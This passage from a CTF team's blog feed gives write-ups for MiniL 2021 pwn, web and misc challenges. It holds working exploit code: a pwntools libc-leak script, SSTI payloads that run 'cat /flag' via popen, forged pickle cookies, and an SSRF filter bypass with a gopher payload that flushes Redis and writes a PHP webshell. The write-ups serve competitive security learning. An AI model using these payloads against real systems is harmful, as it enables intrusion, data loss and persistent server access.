class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line"></span><br><span class="line">p=process([<span class="string">'./pwny'</span>],env={<span class="string">"LD_PRELOAD"</span>:<span class="string">"./libc-2.27.so"</span>})</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write</span>(<span class="params">index,second</span>):</span></span><br><span class="line"> p.recvuntil(<span class="string">'Your choice: '</span>)</span><br><span class="line"> p.sendline(<span class="string">'2'</span>)</span><br><span class="line"> p.recvuntil(<span class="string">'Index: '</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"> <span class="keyword">if</span> second != <span class="string">'null'</span>:</span><br><span class="line"> p.sendline(second)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">read</span>(<span class="params">index</span>):</span></span><br><span 
class="line"> p.recvuntil(<span class="string">'Your choice: '</span>)</span><br><span class="line"> p.sendline(<span class="string">'1'</span>)</span><br><span class="line"> p.recvuntil(<span class="string">'Index: '</span>)</span><br><span class="line"> p.sendline(index)</span><br><span class="line"> p.recvuntil(<span class="string">'Result: '</span>)</span><br><span class="line"> </span><br><span class="line"><span class="comment">#fd_urandom=0</span></span><br><span class="line">write(<span class="number">256</span>,<span class="string">'null'</span>)</span><br><span class="line">write(<span class="number">256</span>,<span class="string">'null'</span>) <span class="comment"># read twice to change fd to 0</span></span><br><span class="line"></span><br><span class="line">read(p64(<span class="number">0xFFFFFFFFFFFFFFFA</span>))</span><br><span class="line">libc_base=<span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)-<span class="number">0x3EBA00</span></span><br><span class="line">print(<span class="string">'libc_base'</span>,<span class="built_in">hex</span>(libc_base))</span><br><span class="line">read(p64(<span class="number">0xFFFFFFFFFFFFFFF5</span>))</span><br><span class="line">base=<span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)-<span class="number">0x202008</span></span><br><span class="line">print(<span class="string">'base'</span>,<span class="built_in">hex</span>(base))</span><br><span class="line"></span><br><span class="line">dl_rtld_unlock_recursive=libc_base+<span class="number">0x61BF68</span></span><br><span class="line">index=(dl_rtld_unlock_recursive-(base+<span class="number">0x202060</span>))//<span class="number">8</span></span><br><span class="line">one_gadget=libc_base+<span class="number">0x10a428</span></span><br><span class="line">write(index,p64(one_gadget))</span><br><span class="line"></span><br><span
class="line">gdb.attach(p)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> CTF学习笔记 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> PWN </tag>
</tags>
</entry>
<entry>
<title>2021MiniL 7!u!w</title>
<link href="2021/05/13/MiniL-7-u-w/"/>
<url>2021/05/13/MiniL-7-u-w/</url>
<content type="html"><![CDATA[<h1 id="MiniL"><a href="#MiniL" class="headerlink" title="MiniL"></a>MiniL</h1><p><font color="green"><strong>URL</strong>:<a href="https://ctf.xidian.edu.cn/#/index">https://ctf.xidian.edu.cn/#/index</a><br><br><strong>Team</strong>:7!u!w<br><br><strong>Members</strong>:Noah && Wanan && BB<br><br><strong>Start Time</strong>: 5.06 20:00<br><br><strong>End Time</strong>: 5.12 20:00</font></p><h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="WEB1-easy-java-Worked-Wanan-amp-Noah"><a href="#WEB1-easy-java-Worked-Wanan-amp-Noah" class="headerlink" title="WEB1-easy_java | Worked: Wanan&Noah"></a>WEB1-easy_java | Worked: <code>Wanan</code>&Noah</h3><h4 id="Payload"><a href="#Payload" class="headerlink" title="Payload"></a>Payload</h4><figure class="highlight haskell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title">http</span>://<span class="number">8</span>a9b571f<span class="number">-0700</span><span class="number">-4244</span><span class="number">-98e6</span>-df5692c7de61.web.woooo.tech//?code=(new java.io.<span class="type">BufferedReader</span>(new java.io.<span class="type">FileReader</span>(<span class="string">"/flag"</span>))).readLine()</span><br></pre></td></tr></table></figure><hr><h3 id="WEB2-L-inc-Worked-Wanan-amp-Noah"><a href="#WEB2-L-inc-Worked-Wanan-amp-Noah" class="headerlink" title="WEB2-L inc. | Worked: Wanan&Noah"></a>WEB2-L <code>inc</code>. 
| Worked: <code>Wanan</code>&Noah</h3><h4 id="预期解"><a href="#预期解" class="headerlink" title="预期解"></a>Intended solution</h4><p>After <code>base64</code> decoding, change <code>NEWFALSE(0x89)</code> in the serialized string to <code>NEWTRUE(0x88)</code>, and we can log in normally.</p><p>Serialization and deserialization are done with <code>pickle</code> and <code>pickletools</code>.</p><p>After logging in, the username field has an SSTI; change the username to the injection payload.</p><h5 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># WEB2-1.py</span></span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64encode <span class="keyword">as</span> be</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">url = <span class="built_in">input</span>(<span class="string">"\033[1;34m[^_^] ? 
Input Target Url: \033[0m"</span>) + <span class="string">"home"</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"> code = <span class="string">"{{"</span> + <span class="built_in">input</span>(<span class="string">"\033[1;34m[^_^] > \033[0m"</span>).replace(<span class="string">"\""</span>, <span class="string">"\'"</span>) + <span class="string">"}}"</span></span><br><span class="line"> code_len = <span class="built_in">hex</span>(<span class="built_in">len</span>(code))[<span class="number">2</span>:]</span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">len</span>(code_len) > <span class="number">2</span>:</span><br><span class="line"> print(<span class="string">"\033[1;31m[x_x] ! Code length limit breakthrough, limit: 0xff.\033[0m"</span>)</span><br><span class="line"> <span class="keyword">if</span> <span class="built_in">len</span>(code_len) == <span class="number">1</span>:</span><br><span class="line"> code_len = <span class="string">"0"</span> + code_len</span><br><span class="line"> code_len = <span class="string">r"\x"</span> + code_len</span><br><span class="line"> basestr = [<span class="string">r"\x80\x04\x95/\x00\x00\x00\x00\x00\x00\x00\x8c\x03app\x94\x8c\x04User\x94\x93\x94)\x81\x94}\x94(\x8c\x04name\x94\x8c"</span>, <span class="string">r"\x94\x8c\x03vip\x94\x88ub."</span>]</span><br><span class="line"> payload = <span class="string">"b\""</span> + basestr[<span class="number">0</span>] + code_len + code + basestr[<span class="number">1</span>] + <span class="string">"\""</span></span><br><span class="line"> <span class="comment"># print(eval(payload))</span></span><br><span class="line"> payload_b = be(<span class="built_in">eval</span>(payload)).decode()</span><br><span class="line"> header = {</span><br><span class="line"> <span class="string">"Cookie"</span>: <span class="string">"user="</span> + 
payload_b,</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> response = requests.get(url=url, headers=header)</span><br><span class="line"> pattern = re.<span class="built_in">compile</span>(<span class="string">r'<h1>Hello, dear ([\w\W]*)</h1>'</span>)</span><br><span class="line"> result = re.search(pattern, response.text)</span><br><span class="line"> <span class="keyword">if</span> result:</span><br><span class="line"> print(result.group(<span class="number">1</span>))</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> print(<span class="string">"\033[1;31m[x_x] ! Error, no response context find.\033[0m"</span>)</span><br><span class="line"> <span class="keyword">except</span> requests.ConnectionError:</span><br><span class="line"> print(<span class="string">"\033[1;31m[x_x] ! Error, examine your network connection.\033[0m"</span>)</span><br></pre></td></tr></table></figure><h4 id="非预期"><a href="#非预期" class="headerlink" title="非预期"></a>Unintended solution</h4><p>Guess that the <code>flag</code> is at <code>/flag</code>, hand-write the <code>opcode</code> so that the username field becomes the <code>flag</code>, and it is echoed back</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># WEB2-2.py</span></span><br><span class="line"><span class="keyword">import</span> app</span><br><span
class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">data = <span class="string">b"""capp</span></span><br><span class="line"><span class="string">User</span></span><br><span class="line"><span class="string">(c__builtin__</span></span><br><span class="line"><span class="string">getattr</span></span><br><span class="line"><span class="string">p0</span></span><br><span class="line"><span class="string">(c__builtin__</span></span><br><span class="line"><span class="string">open</span></span><br><span class="line"><span class="string">(S'/flag'</span></span><br><span class="line"><span class="string">tRS'read'</span></span><br><span class="line"><span class="string">tRp1</span></span><br><span class="line"><span class="string">)RI01</span></span><br><span class="line"><span class="string">tR."""</span></span><br><span class="line"></span><br><span class="line">print(base64.b64encode(data))</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># app.py</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span>(<span class="params"><span class="built_in">object</span></span>):</span></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">__init__</span>(<span class="params">self, name, vip</span>):</span></span><br><span class="line"> self.name = name</span><br><span class="line"> self.vip = vip</span><br></pre></td></tr></table></figure><p>Learned how to hand-write <code>opcode</code>; quite rewarding</p><hr><h3 id="WEB3-template-Worked-Wanan-amp-Noah"><a href="#WEB3-template-Worked-Wanan-amp-Noah" class="headerlink" title="WEB3-template | 
Worked: Wanan&Noah"></a>WEB3-template | Worked: <code>Wanan</code>&Noah</h3><p>First manually deobfuscated the script and found that the filtering of braces and percent signs happens on the front end, so we can send requests directly to <code>/build</code>; after that it is just a matter of bypassing the ssti filter</p><p>The deobfuscated JS code:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// script.js</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">abc</span>(<span class="params">a, b</span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> la = a[<span class="string">'length'</span>];</span><br><span class="line"> <span class="keyword">var</span> lb = b[<span class="string">'length'</span>];</span><br><span class="line"> <span class="keyword">var</span> ans = [];</span><br><span class="line"> <span
class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < lb; i++) {</span><br><span class="line"> ans[i] = <span class="built_in">String</span>.fromCharCode(a[i % la].charCodeAt(<span class="number">0</span>) ^ b[i].charCodeAt(<span class="number">0</span>));</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> ans[<span class="string">'join'</span>](<span class="string">''</span>);</span><br><span class="line">};</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">de</span>(<span class="params">a1, a2</span>) </span>{</span><br><span class="line"> <span class="keyword">return</span> abc(a1, atob(a2));</span><br><span class="line">};</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">submit</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> input = <span class="built_in">document</span>.getElementById(<span class="string">'code'</span>)[<span class="string">'value'</span>];</span><br><span class="line"> <span class="keyword">if</span> (input.search(<span class="string">'{|}|%'</span>) !== -<span class="number">1</span>) {</span><br><span class="line"> alert(<span class="string">'hack!!!!!'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">var</span> key = abc(<span class="string">'xdsecminil'</span>, input);</span><br><span class="line"> <span class="keyword">var</span> XMLResponce = <span class="keyword">new</span> XMLHttpRequest();</span><br><span class="line"> XMLResponce.open(<span class="string">'POST'</span>, <span class="string">'/build'</span>, <span class="literal">true</span>);</span><br><span class="line"> 
XMLResponce.setRequestHeader(<span class="string">'Content-type'</span>, <span class="string">'application/x-www-form-urlencoded'</span>);</span><br><span class="line"> <span class="keyword">var</span> data = <span class="string">'data='</span> + btoa(key);</span><br><span class="line"> XMLResponce.send(data);</span><br><span class="line"> XMLResponce.onreadystatechange = <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (XMLResponce.status === <span class="number">200</span>) {</span><br><span class="line"> <span class="built_in">document</span>.getElementById(<span class="string">'result'</span>).innerText = XMLResponce.responseText;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> alert(<span class="string">"request error"</span>);</span><br><span class="line"> }</span><br><span class="line"> };</span><br><span class="line"> }</span><br><span class="line"> ;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h4 id="EXP-1"><a href="#EXP-1" class="headerlink" title="EXP"></a>EXP</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span 
class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64decode <span class="keyword">as</span> bd</span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64encode <span class="keyword">as</span> be</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">abc</span>(<span class="params">a, b</span>):</span></span><br><span class="line"> len_a = <span class="built_in">len</span>(a)</span><br><span class="line"> len_b = <span class="built_in">len</span>(b)</span><br><span class="line"> result = <span class="string">""</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(len_b):</span><br><span class="line"> result += <span class="built_in">chr</span>(<span 
class="built_in">ord</span>(a[i % len_a]) ^ <span class="built_in">ord</span>(b[i]))</span><br><span class="line"> <span class="keyword">return</span> result</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">de</span>(<span class="params">a, b</span>):</span></span><br><span class="line"> <span class="keyword">return</span> abc(a, bd(b))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_key</span>(<span class="params">a</span>):</span></span><br><span class="line"> <span class="keyword">return</span> be(abc(<span class="string">"xdsecminil"</span>, a).encode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="built_in">input</span>(<span class="string">"\033[1;34m[^_^] ? Input Target Url: \033[0m"</span>) + <span class="string">"build"</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"> code = <span class="built_in">input</span>(<span class="string">"\033[1;34m[^_^] > \033[0m"</span>)</span><br><span class="line"> <span class="keyword">if</span> code == <span class="string">"BRUTE"</span>:</span><br><span class="line"> <span class="keyword">for</span> p <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">200</span>):</span><br><span class="line"> pcode = <span class="string">r'{{""["__cla""ss__"]["__ba""se__"]["__subcl""asses__"]()['</span> + <span class="built_in">str</span>(p) + <span class="string">r']["__in""it__"]["__glo""bals__"]["__buil""tins__"]["eval"]("__import__(\"o\"\"s\")")["popen"]("cat /fl""ag")["read"]()}}'</span></span><br><span class="line"> data = {</span><br><span class="line"> <span
class="string">"data"</span>: get_key(pcode).decode(),</span><br><span class="line"> }</span><br><span class="line"> response = requests.post(url=url, data=data)</span><br><span class="line"> <span class="keyword">if</span> <span class="string">"500"</span> <span class="keyword">in</span> response.text:</span><br><span class="line"> print(<span class="string">"\033[1;31m[x_x] @"</span>, p, <span class="string">" is not correct.\033[0m"</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> print(<span class="string">"\033[1;33m[@_@] Probably find flag.\033[0m"</span>)</span><br><span class="line"> print(<span class="string">"\033[1;33m"</span>, response.text, <span class="string">"\033[0m"</span>)</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> time.sleep(<span class="number">0.2</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> key = get_key(code).decode()</span><br><span class="line"> data = {</span><br><span class="line"> <span class="string">"data"</span>: key,</span><br><span class="line"> }</span><br><span class="line"> response = requests.post(url=url, data=data)</span><br><span class="line"> <span class="keyword">if</span> <span class="string">"500 Internal Server Error"</span> <span class="keyword">in</span> response:</span><br><span class="line"> print(<span class="string">"\033[1;31m[x_x] Execute Error.\033[0m"</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> print(response.text)</span><br></pre></td></tr></table></figure><hr><h3 id="WEB4-protocol-Worked-Wanan-amp-Noah"><a href="#WEB4-protocol-Worked-Wanan-amp-Noah" class="headerlink" title="WEB4-protocol | Worked: Wanan&Noah"></a>WEB4-protocol | Worked: 
<code>Wanan</code>&Noah</h3><p><del>Entering an arbitrary address fetched the corresponding page.</del></p><p>The environment was later changed and could no longer reach the public internet.</p><p>Testing showed that <code>file://</code>, <code>127.0.0.1</code> and <code>localhost</code> are all filtered.</p><p>The <code>file://</code> filter can be bypassed with <code>file:</code> followed directly by an absolute path (a single slash, which curl still accepts as a file URL), and the <code>127.0.0.1</code> filter with <code>0.0.0.0</code>, which on Linux also connects to the local host.</p><p>payload: <code>url=file:/var/www/html/index.php</code></p><p>The <code>php</code> source is visible in the returned page source:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><!DOCTYPE html></span><br><span class="line"><html lang=<span class="string">"en"</span>></span><br><span class="line"><head></span><br><span class="line"> <meta charset=<span class="string">"UTF-8"</span>></span><br><span class="line"> <title>Title</title></span><br><span class="line"></head></span><br><span 
class="line"><body></span><br><span class="line"> <a>访问点东西?</a><br/><br/></span><br><span class="line"><div></span><br><span class="line"> <form action=<span class="string">"index.php"</span> method=<span class="string">"POST"</span> ></span><br><span class="line"><input type=<span class="string">"text"</span> name=<span class="string">"url"</span> placeholder=<span class="string">"Your url"</span> /></span><br><span class="line"></form><br/></span><br><span class="line"></div></span><br><span class="line"></body></span><br><span class="line"></html></span><br><span class="line"></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">curl</span>(<span class="params"><span class="variable">$url</span></span>)</span>{ </span><br><span class="line"> <span class="variable">$ch</span> = curl_init();</span><br><span class="line"> curl_setopt(<span class="variable">$ch</span>, CURLOPT_URL, <span class="variable">$url</span>);</span><br><span class="line"> curl_setopt(<span class="variable">$ch</span>, CURLOPT_HEADER, <span class="number">0</span>);</span><br><span class="line"> <span class="keyword">echo</span> curl_exec(<span class="variable">$ch</span>);</span><br><span class="line"> curl_close(<span class="variable">$ch</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'url'</span>])){</span><br><span class="line"><span class="variable">$url</span> = <span class="variable">$_POST</span>[<span class="string">'url'</span>];</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">'/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is'</span>, <span class="variable">$url</span>,<span class="variable">$match</span>)) {</span><br><span class="line"><span 
class="keyword">die</span>(<span class="string">'这样子可不行哦'</span>);</span><br><span class="line">}</span><br><span class="line">curl(<span class="variable">$url</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'minisecret'</span>])){</span><br><span class="line">system(<span class="string">'ifconfig eth1'</span>);</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>The filter blocks <code>file://</code>, <code>dict</code>, <code>../</code>, <code>127.0.0.1</code> and <code>localhost</code>. It is a plain <code>preg_match</code> blacklist, so <code>file:</code> with a single slash, <code>0.0.0.0</code> and the <code>gopher://</code> scheme all pass untouched, which is what the rest of the solve relies on.</p><p>Sending the <code>minisecret</code> <code>POST</code> parameter runs <code>ifconfig eth1</code> and reveals the network configuration:</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">eth1: flags=4163 mtu 1450 inet 172.192.15.2 </span><br><span class="line">netmask 255.255.255.0 broadcast 172.192.15.255 </span><br><span class="line">ether 02:42:ac:c0:0f:02 txqueuelen 0 (Ethernet) </span><br><span class="line">RX packets 0 bytes 0 (0.0 B) </span><br><span class="line">RX errors 0 dropped 0 overruns 0 frame 0 </span><br><span class="line">TX packets 0 bytes 0 (0.0 B) </span><br><span class="line">TX errors 0 dropped 0 overruns 0 carrier 0 collisions 
0</span><br></pre></td></tr></table></figure><p>So this is a host on an internal network; from the <code>ifconfig</code> output (<code>172.192.15.2</code>, netmask <code>255.255.255.0</code>) its subnet is <code>172.192.15.0/24</code>.</p><p>Probing the neighbours showed that <code>172.192.15.3</code> also runs an <code>http</code> service, with a hint: the <code>flag</code> is on this machine, but how will you get it?</p><p>Manually trying the ports that <code>ssrf</code> is usually pointed at showed <code>redis</code> listening on <code>6379</code>, so a <code>gopher</code> payload generated with <code>gopherus</code> was sent straight at <code>redis</code>. Decoded, the <code>%0D%0A</code>-separated lines are plain RESP: <code>flushall</code>; <code>set 1</code> with the value <code><?php system("cat /flag");?></code>; <code>config set dir /var/www/html</code>; <code>config set dbfilename shell.php</code>; <code>save</code>. The RDB dump therefore lands in the web root as <code>shell.php</code>, a webshell that reads <code>/flag</code>. Because <code>lt</code> (the challenge setter) filtered <code>../</code>, the location of the flag was simply guessed as <code>/flag</code>, and fetching <code>shell.php</code> on that host through the same SSRF returned the <code>flag</code>. Two things to keep in mind with this technique: <code>flushall</code> wipes whatever the instance holds, and the write only works if the <code>redis</code> process is allowed to write into the web root.</p><h4 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url=gopher://172.192.15.3:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A</span><br></pre></td></tr></table></figure><hr><h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="MISC1-好白给的签到题-Worked-Noah"><a href="#MISC1-好白给的签到题-Worked-Noah" class="headerlink" title="MISC1-好白给的签到题 | Worked: Noah"></a>MISC1-好白给的签到题 | Worked: Noah</h3><h4 id="EXP-2"><a href="#EXP-2" class="headerlink" title="EXP"></a>EXP</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 
class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64decode <span class="keyword">as</span> bd</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    fin = <span class="built_in">open</span>(<span class="string">"story.txt"</span>, <span class="string">"rb"</span>)</span><br><span class="line">    data = fin.read()</span><br><span class="line">    fin.close()</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        data_ = bd(data)</span><br><span class="line">        data_.decode(<span class="string">"utf-8"</span>)</span><br><span class="line">    <span class="keyword">except</span> Exception:</span><br><span class="line">        data_ = bd(data[::-<span class="number">1</span>])  <span class="comment"># this layer was stored reversed</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">"{"</span> <span class="keyword">in</span> data_.decode():</span><br><span class="line">        print(data_.decode())</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    fout = <span class="built_in">open</span>(<span class="string">"story.txt"</span>, <span class="string">"wb"</span>)</span><br><span class="line">    print(data_)</span><br><span class="line">    fout.write(data_)</span><br><span class="line">    fout.close()</span><br></pre></td></tr></table></figure><hr><h3 id="MISC2-抓猫猫-Worked-Wanan-amp-Noah"><a href="#MISC2-抓猫猫-Worked-Wanan-amp-Noah" class="headerlink" title="MISC2-抓猫猫 | Worked: Wanan&Noah"></a>MISC2-抓猫猫 | Worked: <code>Wanan</code>&Noah</h3><p>A <code>k</code>-multiple take-away game (k倍博弈).</p><p>After each of <code>cdcq</code>'s moves, write the number of cats left in binary and take away all of the low-order 1 bits that fit within the current take limit.</p><p>This guarantees that every time <code>cdcq</code> grabs cats, the subtraction has to borrow from a 0 bit.</p><hr><h3 
